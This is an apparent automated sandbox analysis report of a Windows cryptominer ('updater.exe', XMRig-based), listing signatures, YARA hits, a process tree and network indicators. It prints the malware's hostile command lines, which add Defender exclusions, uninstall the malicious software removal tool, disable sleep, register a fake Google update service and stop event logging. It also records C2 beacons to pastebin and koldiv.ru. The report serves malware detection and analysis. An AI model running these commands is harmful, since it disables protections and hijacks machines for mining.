Windows Analysis Report
updater.exe

Overview

General Information

Sample name: updater.exe
Analysis ID: 1478400
MD5: d82677ac9971e38439a6f8069e8ba5bf
SHA1: 534b60e16989751c4e2252bbbcc38d97b979f2d0
SHA256: f981ff1ec7014262015fa7ff9cc01097e98ecec7385e0828b7d91dde5b38ce03
Tags: exe, SilentCryptoMiner, UnamSanctam

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to a pastebin service (likely for C&C)
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • updater.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\updater.exe" MD5: D82677AC9971E38439A6F8069E8BA5BF)
    • powershell.exe (PID: 3376 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5568 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 5596 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 3872 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5760 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5040 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6176 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6364 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 892 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5272 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5348 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • updater.exe (PID: 1896 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: D82677AC9971E38439A6F8069E8BA5BF)
    • powershell.exe (PID: 3304 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5600 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 1096 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 3688 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4148 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4292 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1632 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 2568 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 5596 cmdline: conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 4436 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
sslproxydump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Source | Rule | Description | Author | Strings
00000027.00000002.3249654814.000002862EC04000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000027.00000002.3249654814.000002862EC16000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000027.00000003.2729862472.000002862EC1F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x37eb98:$a1: mining.set_target
  • 0x370e20:$a2: XMRIG_HOSTNAME
  • 0x373748:$a3: Usage: xmrig [OPTIONS]
  • 0x370df8:$a4: XMRIG_VERSION

Source | Rule | Description | Author | Strings
39.2.conhost.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
39.2.conhost.exe.140000000.0.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x37ef98:$a1: mining.set_target
  • 0x371220:$a2: XMRIG_HOSTNAME
  • 0x373b48:$a3: Usage: xmrig [OPTIONS]
  • 0x3711f8:$a4: XMRIG_VERSION
39.2.conhost.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
  • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
39.2.conhost.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen
  • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3cd180:$s3: \\.\WinRing0_
  • 0x376148:$s4: pool_wallet
  • 0x3705f0:$s5: cryptonight
  • 0x370600:$s5: cryptonight
  • 0x370610:$s5: cryptonight
  • 0x370620:$s5: cryptonight
  • 0x370638:$s5: cryptonight
  • 0x370648:$s5: cryptonight
  • 0x370658:$s5: cryptonight
  • 0x370670:$s5: cryptonight
  • 0x370680:$s5: cryptonight
  • 0x370698:$s5: cryptonight
  • 0x3706b0:$s5: cryptonight
  • 0x3706c0:$s5: cryptonight
  • 0x3706d0:$s5: cryptonight
  • 0x3706e0:$s5: cryptonight
  • 0x3706f8:$s5: cryptonight
  • 0x370710:$s5: cryptonight
  • 0x370720:$s5: cryptonight
  • 0x370730:$s5: cryptonight

Change of critical system settings

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 6300, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 3872, ProcessName: powercfg.exe

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 6300, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3376, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 6300, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3376, ProcessName: powershell.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 6300, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 892, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 6300, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3376, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 4436, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 6300, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5272, ProcessName: sc.exe
No Snort rule has matched

Timestamp: 2024-07-22T15:45:08.333951+0200
SID: 2826930
Source Port: 49724
Destination Port: 443
Protocol: TCP
Classtype: Crypto Currency Mining Activity Detected

Timestamp: 2024-07-22T15:46:06.697997+0200
SID: 2047928
Source Port: 60971
Destination Port: 53
Protocol: UDP
Classtype: Crypto Currency Mining Activity Detected

Timestamp: 2024-07-22T15:46:06.696381+0200
SID: 2054247
Source Port: 80
Destination Port: 49723
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-22T15:45:05.821446+0200
SID: 2040353
Source Port: 52943
Destination Port: 53
Protocol: UDP
Classtype: Crypto Currency Mining Activity Detected

Timestamp: 2024-07-22T15:45:11.088905+0200
SID: 2044697
Source Port: 49708
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-22T15:46:06.695665+0200
SID: 2044697
Source Port: 49723
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: http://koldiv.ru; Avira URL Cloud: Label: malware
Source: http://koldiv.ru/api/endpoint.php; Avira URL Cloud: Label: malware
Source: http://koldiv.ru/http://koldiv.ru; Avira URL Cloud: Label: malware
Source: C:\ProgramData\Google\Chrome\updater.exe; ReversingLabs: Detection: 65%
Source: updater.exe; ReversingLabs: Detection: 65%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability

Bitcoin Miner

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000027.00000002.3249654814.000002862EC04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000027.00000002.3249654814.000002862EC16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000027.00000003.2729862472.000002862EC1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: conhost.exe PID: 5596, type: MEMORYSTR
Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: stratum+tcp://
Source: conhost.exe; String found in binary or memory: cryptonight-monerov7
Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: Usage: xmrig [OPTIONS]
Source: updater.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb; source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmp

Networking

Source: unknown; DNS query: name: pastebin.com
Source: global traffic; TCP traffic: 192.168.2.5:49704 -> 162.19.139.184:12222
Source: Joe Sandbox View; IP Address: 141.94.96.195
Source: Joe Sandbox View; IP Address: 104.20.4.235
Source: Joe Sandbox View; IP Address: 104.20.4.235
Source: Joe Sandbox View; IP Address: 162.19.139.184
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected:
    GET /raw/HpN5DV4T HTTP/1.1
    Accept: */*
    Connection: close
    Host: pastebin.com
    User-Agent: cpp-httplib/0.12.6
Source: global traffic; HTTP traffic detected:
    GET /raw/xhASwz5f HTTP/1.1
    Accept: */*
    Connection: close
    Host: pastebin.com
    User-Agent: cpp-httplib/0.12.6
Source: global traffic; HTTP traffic detected:
    GET /http://koldiv.ru HTTP/1.1
    Accept: */*
    Connection: close
    Host: koldiv.ru
    User-Agent: cpp-httplib/0.12.6
Source: global traffic; DNS traffic detected: DNS query: xmr.2miners.com
Source: global traffic; DNS traffic detected: DNS query: koldiv.ru
Source: global traffic; DNS traffic detected: DNS query: pastebin.com
Source: global traffic; DNS traffic detected: DNS query: pool.supportxmr.com
Source: unknown; HTTP traffic detected:
    POST /api/endpoint.php HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 366
    Content-Type: application/json
    Host: koldiv.ru
    User-Agent: cpp-httplib/0.12.6
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.25.4
    Date: Mon, 22 Jul 2024 13:45:07 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Vary: accept-language,accept-charset
    Accept-Ranges: bytes
    Content-Language: en
Source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: conhost.exe, 00000027.00000003.2414280384.000002862EC60000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://koldiv.ru
Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://koldiv.ru/api/endpoint.php
Source: conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://koldiv.ruCESSOR_REVI
Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: https://172.94.1q
Source: conhost.exe, 00000027.00000003.2414280384.000002862EC60000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://pastebin.com/raw/HpN5DV4T
Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2414280384.000002862EC60000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://pastebin.com/raw/xhASwz5f
Source: conhost.exe, 00000027.00000003.2414280384.000002862EC60000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://pastebin.com/raw/xhASwz5fRunning
Source: conhost.exe, 00000027.00000003.2152302371.000002862EC26000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://pastebin.com/raw/xhASwz5fX
Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: https://xmrig.com/docs/algorithms
Source: unknown; Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49724

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\updater.exe; File written: C:\Windows\System32\drivers\etc\hosts

                System Summary

                barindex
                Source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1, Author: unknown
                Source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
                Source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware, Author: ditekSHen
                Source: 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1, Author: unknown
                Source: Process Memory Space: conhost.exe PID: 5596, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1, Author: unknown
                Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Windows\System32\conhost.exe | Code function: 36_2_0000000140001394 NtQueryInformationFile, 36_2_0000000140001394
                Source: C:\ProgramData\Google\Chrome\updater.exe | File created: C:\Windows\TEMP\maoxoafwbtki.sys
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_c2tvagps.hao.ps1
                Source: C:\Windows\System32\conhost.exe | Code function: 36_2_0000000140003250, 36_2_0000000140003250
                Source: C:\Windows\System32\conhost.exe | Code function: 36_2_00000001400027D0, 36_2_00000001400027D0
                Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\maoxoafwbtki.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                Source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWinRing0.sys2 vs updater.exe
                Source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 (reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25)
                Source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 (date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/)
                Source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 (author = ditekSHen, description = Detects coinmining malware)
                Source: 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 (reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25)
